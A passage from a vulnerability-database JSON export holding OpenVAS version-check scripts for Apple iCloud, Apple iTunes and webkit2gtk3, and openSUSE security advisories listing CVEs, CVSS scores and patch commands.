script_tag(name:\"impact\", value:\"Successful exploitation allows attackers\n to elevate privileges, conduct arbitrary code execution, cross site scripting\n and disclose sensitive information.\");\n\n script_tag(name:\"affected\", value:\"Apple iCloud versions before 7.11\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apple iCloud 7.11 or later. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_xref(name:\"URL\", value:\"https://support.apple.com/en-us/HT209605\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_apple_icloud_detect_win.nasl\");\n script_mandatory_keys(\"apple/icloud/Win/Ver\");\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE)){\n exit(0);\n}\n\nicVer = infos['version'];\nicPath = infos['location'];\n\nif(version_is_less(version:icVer, test_version:\"7.11\"))\n{\n report = report_fixed_ver(installed_version:icVer, fixed_version:\"7.11\", install_path:icPath);\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-31T16:46:55", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2019-01-24T00:00:00", "type": "openvas", "title": "openSUSE: Security Advisory for webkit2gtk3 (openSUSE-SU-2019:0081-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-4361", "CVE-2018-4437", "CVE-2018-4328", "CVE-2018-4372", "CVE-2018-4358", "CVE-2018-4442", "CVE-2018-4323", "CVE-2018-4165", "CVE-2018-4319", "CVE-2018-4443", "CVE-2018-4392", "CVE-2018-4345", "CVE-2018-4376", "CVE-2018-4207", "CVE-2018-4299", "CVE-2018-4438", "CVE-2018-4212", "CVE-2018-4213", "CVE-2018-4197", "CVE-2018-4315", "CVE-2018-4163", "CVE-2018-4318", "CVE-2018-11713", "CVE-2018-4162", "CVE-2018-4314", "CVE-2018-4382", "CVE-2018-4316", "CVE-2018-4464", "CVE-2018-4306", "CVE-2018-4209", "CVE-2018-4210", "CVE-2018-4375", "CVE-2018-4191", "CVE-2018-4312", "CVE-2018-4208", "CVE-2018-4378", "CVE-2018-4441", "CVE-2018-4317", "CVE-2018-4309", "CVE-2018-4373", "CVE-2018-4416", "CVE-2018-4359", "CVE-2018-4386"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310852248", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310852248", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.852248\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_cve_id(\"CVE-2018-11713\", \"CVE-2018-4162\", \"CVE-2018-4163\", \"CVE-2018-4165\",\n \"CVE-2018-4191\", \"CVE-2018-4197\", \"CVE-2018-4207\", \"CVE-2018-4208\",\n \"CVE-2018-4209\", \"CVE-2018-4210\", \"CVE-2018-4212\", \"CVE-2018-4213\",\n \"CVE-2018-4299\", \"CVE-2018-4306\", \"CVE-2018-4309\", \"CVE-2018-4312\",\n \"CVE-2018-4314\", \"CVE-2018-4315\", \"CVE-2018-4316\", \"CVE-2018-4317\",\n \"CVE-2018-4318\", \"CVE-2018-4319\", \"CVE-2018-4323\", \"CVE-2018-4328\",\n \"CVE-2018-4345\", \"CVE-2018-4358\", \"CVE-2018-4359\", \"CVE-2018-4361\",\n \"CVE-2018-4372\", \"CVE-2018-4373\", \"CVE-2018-4375\", \"CVE-2018-4376\",\n \"CVE-2018-4378\", \"CVE-2018-4382\", \"CVE-2018-4386\", \"CVE-2018-4392\",\n \"CVE-2018-4416\", \"CVE-2018-4437\", \"CVE-2018-4438\", \"CVE-2018-4441\",\n \"CVE-2018-4442\", \"CVE-2018-4443\", \"CVE-2018-4464\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2019-01-24 04:02:18 +0100 (Thu, 24 Jan 2019)\");\n script_name(\"openSUSE: Security Advisory for webkit2gtk3 (openSUSE-SU-2019:0081-1)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSELeap15\\.0\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2019:0081-1\");\n script_xref(name:\"URL\", value:\"https://lists.opensuse.org/opensuse-security-announce/2019-01/msg00029.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'webkit2gtk3'\n package(s) announced via the openSUSE-SU-2019:0081-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for webkit2gtk3 to version 2.22.5 fixes the following issues:\n\n Security issues fixed:\n\n - CVE-2018-4372, CVE-2018-4345, CVE-2018-4386, CVE-2018-4375,\n CVE-2018-4376, CVE-2018-4378, CVE-2018-4382, CVE-2018-4392,\n CVE-2018-4416, CVE-2018-4191, CVE-2018-4197, CVE-2018-4299,\n CVE-2018-4306, CVE-2018-4309, CVE-2018-4312, CVE-2018-4314,\n CVE-2018-4315, CVE-2018-4316, CVE-2018-4317, CVE-2018-4318,\n CVE-2018-4319, CVE-2018-4323, CVE-2018-4328, CVE-2018-4358,\n CVE-2018-4359, CVE-2018-4361, CVE-2018-4373, CVE-2018-4162,\n CVE-2018-4163, CVE-2018-4165, CVE-2018-11713, CVE-2018-4207,\n CVE-2018-4208, CVE-2018-4209, CVE-2018-4210, CVE-2018-4212,\n CVE-2018-4213, CVE-2018-4437, CVE-2018-4438, CVE-2018-4441,\n CVE-2018-4442, CVE-2018-4443, CVE-2018-4464 (bsc#1119558, bsc#1116998,\n bsc#1110279)\n\n This update was imported from the SUSE:SLE-15:Update update project.\n\n Patch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended\n installation methods\n like YaST online_update or 'zypper patch'.\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 15.0:\n\n zypper in -t patch openSUSE-2019-81=1\");\n\n script_tag(name:\"affected\", value:\"webkit2gtk3 on openSUSE Leap 15.0.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap15.0\") {\n if(!isnull(res = isrpmvuln(pkg:\"libjavascriptcoregtk-4_0-18\", rpm:\"libjavascriptcoregtk-4_0-18~2.22.5~lp150.2.9.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libjavascriptcoregtk-4_0-18-debuginfo\", rpm:\"libjavascriptcoregtk-4_0-18-debuginfo~2.22.5~lp150.2.9.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libwebkit2gtk-4_0-37\", rpm:\"libwebkit2gtk-4_0-37~2.22.5~lp150.2.9.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libwebkit2gtk-4_0-37-debuginfo\", rpm:\"libwebkit2gtk-4_0-37-debuginfo~2.22.5~lp150.2.9.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"typelib-1_0-JavaScriptCore-4_0\", rpm:\"typelib-1_0-JavaScriptCore-4_0~2.22.5~lp150.2.9.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"typelib-1_0-WebKit2-4_0\", rpm:\"typelib-1_0-WebKit2-4_0~2.22.5~lp150.2.9.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"typelib-1_0-WebKit2WebExtension-4_0\", rpm:\"typelib-1_0-WebKit2WebExtension-4_0~2.22.5~lp150.2.9.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit-jsc-4\", rpm:\"webkit-jsc-4~2.22.5~lp150.2.9.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit-jsc-4-debuginfo\", rpm:\"webkit-jsc-4-debuginfo~2.22.5~lp150.2.9.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit2gtk-4_0-injected-bundles\", rpm:\"webkit2gtk-4_0-injected-bundles~2.22.5~lp150.2.9.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit2gtk-4_0-injected-bundles-debuginfo\", rpm:\"webkit2gtk-4_0-injected-bundles-debuginfo~2.22.5~lp150.2.9.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit2gtk3-debugsource\", rpm:\"webkit2gtk3-debugsource~2.22.5~lp150.2.9.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit2gtk3-devel\", rpm:\"webkit2gtk3-devel~2.22.5~lp150.2.9.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit2gtk3-minibrowser\", rpm:\"webkit2gtk3-minibrowser~2.22.5~lp150.2.9.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit2gtk3-minibrowser-debuginfo\", rpm:\"webkit2gtk3-minibrowser-debuginfo~2.22.5~lp150.2.9.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit2gtk3-plugin-process-gtk2\", rpm:\"webkit2gtk3-plugin-process-gtk2~2.22.5~lp150.2.9.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit2gtk3-plugin-process-gtk2-debuginfo\", rpm:\"webkit2gtk3-plugin-process-gtk2-debuginfo~2.22.5~lp150.2.9.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libwebkit2gtk3-lang\", rpm:\"libwebkit2gtk3-lang~2.22.5~lp150.2.9.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libjavascriptcoregtk-4_0-18-32bit\", rpm:\"libjavascriptcoregtk-4_0-18-32bit~2.22.5~lp150.2.9.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libjavascriptcoregtk-4_0-18-32bit-debuginfo\", rpm:\"libjavascriptcoregtk-4_0-18-32bit-debuginfo~2.22.5~lp150.2.9.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libwebkit2gtk-4_0-37-32bit\", rpm:\"libwebkit2gtk-4_0-37-32bit~2.22.5~lp150.2.9.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libwebkit2gtk-4_0-37-32bit-debuginfo\", rpm:\"libwebkit2gtk-4_0-37-32bit-debuginfo~2.22.5~lp150.2.9.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-07-17T14:04:11", "description": "This host is installed with Apple iTunes\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2018-04-02T00:00:00", "type": "openvas", "title": "Apple iTunes Security Updates(HT208694)-Windows", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-4119", "CVE-2018-4130", "CVE-2018-4129", "CVE-2018-4165", "CVE-2018-4146", "CVE-2018-4101", "CVE-2018-4128", "CVE-2018-4163", "CVE-2018-4120", "CVE-2018-4118", "CVE-2018-4114", "CVE-2018-4162", "CVE-2018-4125", "CVE-2018-4113", "CVE-2018-4127", "CVE-2018-4144", "CVE-2018-4117", "CVE-2018-4161", "CVE-2018-4122", "CVE-2018-4121"], "modified": "2019-07-05T00:00:00", "id": "OPENVAS:1361412562310813110", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813110", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apple iTunes Security Updates(HT208694)-Windows\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apple:itunes\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813110\");\n script_version(\"2019-07-05T08:56:43+0000\");\n script_cve_id(\"CVE-2018-4144\", \"CVE-2018-4101\", \"CVE-2018-4114\", \"CVE-2018-4118\",\n \"CVE-2018-4119\", \"CVE-2018-4120\", \"CVE-2018-4121\", \"CVE-2018-4122\",\n \"CVE-2018-4125\", \"CVE-2018-4127\", \"CVE-2018-4128\", \"CVE-2018-4129\",\n \"CVE-2018-4130\", \"CVE-2018-4161\", \"CVE-2018-4162\", \"CVE-2018-4163\",\n \"CVE-2018-4165\", \"CVE-2018-4113\", \"CVE-2018-4146\", \"CVE-2018-4117\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-05 08:56:43 +0000 (Fri, 05 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-04-02 10:32:52 +0530 (Mon, 02 Apr 2018)\");\n script_name(\"Apple iTunes Security Updates(HT208694)-Windows\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Apple iTunes\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - A buffer overflow error due to improper size validation..\n\n - Multiple memory corruption issues due to improper memory handling.\n\n - An array indexing issue in the handling of a function in javascript core.\n\n - A cross-origin issue existed with the fetch API.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation of this vulnerability\n will allow remote attackers to elevate privileges, exfiltrate data cross-origin,\n execute arbitrary code and lead to a denial of service condition.\");\n\n script_tag(name:\"affected\", value:\"Apple iTunes versions before 12.7.4 on Windows\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apple iTunes 12.7.4 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_xref(name:\"URL\", value:\"https://support.apple.com/en-us/HT208694\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_apple_itunes_detection_win_900123.nasl\");\n script_mandatory_keys(\"iTunes/Win/Ver\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif(!infos = get_app_version_and_location( cpe:CPE, exit_no_version:TRUE )) exit(0);\nituneVer = infos['version'];\nitunePath = infos['location'];\n\n##12.7.4 == 12.7.4.76\nif(version_is_less(version:ituneVer, test_version:\"12.7.4.76\"))\n{\n report = report_fixed_ver(installed_version:ituneVer, fixed_version:\"12.7.4\", install_path:itunePath);\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-07-17T14:04:23", "description": "This host is installed with Apple iCloud\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2018-04-02T00:00:00", "type": "openvas", "title": "Apple iCloud Security Updates(HT208697)-Windows", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-4119", "CVE-2018-4130", "CVE-2018-4129", "CVE-2018-4165", "CVE-2018-4146", "CVE-2018-4101", "CVE-2018-4128", "CVE-2018-4163", "CVE-2018-4120", "CVE-2018-4118", "CVE-2018-4114", "CVE-2018-4162", "CVE-2018-4125", "CVE-2018-4113", "CVE-2018-4127", "CVE-2018-4144", "CVE-2018-4117", "CVE-2018-4161", "CVE-2018-4122", "CVE-2018-4121"], "modified": "2019-07-05T00:00:00", "id": "OPENVAS:1361412562310813109", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813109", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apple iCloud Security Updates(HT208697)-Windows\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apple:icloud\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813109\");\n script_version(\"2019-07-05T08:56:43+0000\");\n script_cve_id(\"CVE-2018-4144\", \"CVE-2018-4101\", \"CVE-2018-4114\", \"CVE-2018-4118\",\n \"CVE-2018-4119\", \"CVE-2018-4120\", \"CVE-2018-4121\", \"CVE-2018-4122\",\n \"CVE-2018-4125\", \"CVE-2018-4127\", \"CVE-2018-4128\", \"CVE-2018-4129\",\n \"CVE-2018-4130\", \"CVE-2018-4161\", \"CVE-2018-4162\", \"CVE-2018-4163\",\n \"CVE-2018-4165\", \"CVE-2018-4113\", \"CVE-2018-4146\", \"CVE-2018-4117\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-05 08:56:43 +0000 (Fri, 05 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-04-02 10:23:49 +0530 (Mon, 02 Apr 2018)\");\n script_name(\"Apple iCloud Security Updates(HT208697)-Windows\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Apple iCloud\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - A buffer overflow error due to improper size validation..\n\n - Multiple memory corruption issues due to improper memory handling.\n\n - An array indexing issue in the handling of a function in javascript core.\n\n - A cross-origin issue existed with the fetch API.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation of this vulnerability\n will allow remote attackers to elevate privileges, exfiltrate data cross-origin,\n execute arbitrary code and lead to a denial of service condition.\");\n\n script_tag(name:\"affected\", value:\"Apple iCloud versions before 7.4 on Windows\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apple iCloud 7.4 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n\n script_xref(name:\"URL\", value:\"https://support.apple.com/en-us/HT208697\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_apple_icloud_detect_win.nasl\");\n script_mandatory_keys(\"apple/icloud/Win/Ver\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location( cpe:CPE, exit_no_version:TRUE)) exit(0);\nicVer = infos['version'];\nicPath = infos['location'];\n\n##7.4 == 7.4.0.111\nif(version_is_less(version:icVer, test_version:\"7.4.0.111\"))\n{\n report = report_fixed_ver(installed_version:icVer, fixed_version:\"7.4\", install_path:icPath);\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "suse": [{"lastseen": "2022-04-21T22:49:29", "description": "An update that fixes 6 vulnerabilities is now available.\n\nDescription:\n\n This update for webkit2gtk3 to version 2.22.5 fixes the following issues:\n\n Security issues fixed:\n\n - CVE-2018-4438: Fixed a logic issue which lead to memory corruption\n (bsc#1119554)\n - CVE-2018-4437, CVE-2018-4441, CVE-2018-4442, CVE-2018-4443,\n CVE-2018-4464: Fixed multiple memory corruption issues with improved\n memory handling (bsc#1119553, bsc#1119555, bsc#1119556, bsc#1119557,\n bsc#1119558)\n\n This update was imported from the SUSE:SLE-12-SP2:Update update project.\n\n\nPatch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended installation methods\n like YaST online_update or \"zypper patch\".\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 42.3:\n\n zypper in -t patch openSUSE-2019-108=1", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2019-01-31T00:00:00", "type": "suse", "title": "Security update for webkit2gtk3 (important)", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4437", "CVE-2018-4438", "CVE-2018-4441", "CVE-2018-4442", "CVE-2018-4443", "CVE-2018-4464"], "modified": "2019-01-31T00:00:00", "id": "OPENSUSE-SU-2019:0108-1", "href": "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/O44NYBMJOHD4TQ6XSX4MLKIHRJ7EOLZ7/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-18T12:42:09", "description": "An update that fixes 15 vulnerabilities is now available.\n\nDescription:\n\n This update for webkit2gtk3 to version 2.22.6 fixes the following issues\n (boo#1124937 boo#1119558):\n\n Security vulnerabilities fixed:\n\n - CVE-2018-4437: Processing maliciously crafted web content may lead to\n arbitrary code execution. Multiple memory corruption issues were\n addressed with improved memory handling. (boo#1119553)\n - CVE-2018-4438: Processing maliciously crafted web content may lead to\n arbitrary code execution. A logic issue existed resulting in memory\n corruption. This was addressed with improved state management.\n (boo#1119554)\n - CVE-2018-4441: Processing maliciously crafted web content may lead to\n arbitrary code execution. A memory corruption issue was addressed with\n improved memory handling. (boo#1119555)\n - CVE-2018-4442: Processing maliciously crafted web content may lead to\n arbitrary code execution. A memory corruption issue was addressed with\n improved memory handling. (boo#1119556)\n - CVE-2018-4443: Processing maliciously crafted web content may lead to\n arbitrary code execution. A memory corruption issue was addressed with\n improved memory handling. (boo#1119557)\n - CVE-2018-4464: Processing maliciously crafted web content may lead to\n arbitrary code execution. Multiple memory corruption issues were\n addressed with improved memory handling. (boo#1119558)\n - CVE-2019-6212: Processing maliciously crafted web content may lead to\n arbitrary code execution. Multiple memory corruption issues were\n addressed with improved memory handling.\n - CVE-2019-6215: Processing maliciously crafted web content may lead to\n arbitrary code execution. A type confusion issue was addressed with\n improved memory handling.\n - CVE-2019-6216: Processing maliciously crafted web content may lead to\n arbitrary code execution. Multiple memory corruption issues were\n addressed with improved memory handling.\n - CVE-2019-6217: Processing maliciously crafted web content may lead to\n arbitrary code execution. Multiple memory corruption issues were\n addressed with improved memory handling.\n - CVE-2019-6226: Processing maliciously crafted web content may lead to\n arbitrary code execution. Multiple memory corruption issues were\n addressed with improved memory handling.\n - CVE-2019-6227: Processing maliciously crafted web content may lead to\n arbitrary code execution. A memory corruption issue was addressed with\n improved memory handling

JSC Exploits

Description

Related